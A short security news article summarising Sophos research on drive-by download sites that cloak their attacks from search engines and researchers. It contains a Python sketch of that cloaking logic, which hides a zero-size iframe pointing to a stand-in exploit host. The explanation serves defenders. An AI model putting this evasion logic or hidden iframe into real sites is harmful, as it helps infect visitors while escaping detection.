Drive By Download Sites Using New Tricks To Avoid Detection

Amid an increase in defacements of legitimate websites over the past few weeks, Fraser Howard, a researcher from Sophos, has discovered that the groups behind the attacks are increasingly using sophisticated filtering and dynamic content to avoid detection by search engines and web filtering firms.


If an older generation of drive-by Web attacks were dumb, this new generation is intelligent, Howard said. According to his report, many of the sites Sophos found hosting attacks use complex logic to limit who is served malicious content, including or blocking the injected malicious code depending on the source of the Web traffic request to the compromised site.

Howard’s study of the malicious payloads found logic that let the attackers automatically distinguish requests from bot-infected hosts, uninfected hosts, and search engine Web crawlers. The goal was to serve the attack (either an injected iframe or malicious JavaScript) only to uninfected hosts, while steering clear of search engines and other monitoring outfits looking to blacklist compromised pages. The code Howard analyzed included local IP blacklists that ensured search engine bots were served only clean HTML pages and that users who had already been hit weren’t reinfected, a behavior Howard says makes the problem harder to investigate.
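Howard’s report does not publish the attackers’ source code, but the decision logic he describes can be summarized in a short sketch. The Python below is a hypothetical reconstruction: the crawler User-Agent strings, the page contents, and the in-memory IP set are all illustrative assumptions (real attacks typically implement this server-side, for example in injected PHP, and persist the blacklist between requests).

```python
# Hypothetical sketch of the filtering logic Howard describes in a
# compromised site's gateway script. All names and values here are
# illustrative assumptions, not code recovered from real attacks.

SEARCH_BOT_AGENTS = ("googlebot", "bingbot", "slurp")  # assumed crawler signatures
served_ips = set()  # local IP blacklist: visitors who were already hit once

CLEAN_PAGE = "<html><body>Welcome</body></html>"
MALICIOUS_IFRAME = (
    '<iframe src="http://attacker.example/exploit" '
    'width="0" height="0"></iframe>'
)


def build_response(client_ip: str, user_agent: str) -> str:
    """Decide what to serve based on who is asking."""
    ua = user_agent.lower()

    # Search engine crawlers (and, by extension, scanners that identify
    # themselves as such) are served only clean HTML, so the page is
    # never flagged or blacklisted.
    if any(bot in ua for bot in SEARCH_BOT_AGENTS):
        return CLEAN_PAGE

    # Each IP is attacked only once; a repeat visit, including a
    # researcher reloading the page, sees the clean content.
    if client_ip in served_ips:
        return CLEAN_PAGE

    served_ips.add(client_ip)
    return CLEAN_PAGE + MALICIOUS_IFRAME
```

The one-hit-per-IP behavior is what frustrates investigation: by the time a researcher revisits a reported page from the same address, the server returns nothing but clean HTML.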

Head over to Naked Security to read Howard’s entire report and check out a diagram that illustrates this type of attack.
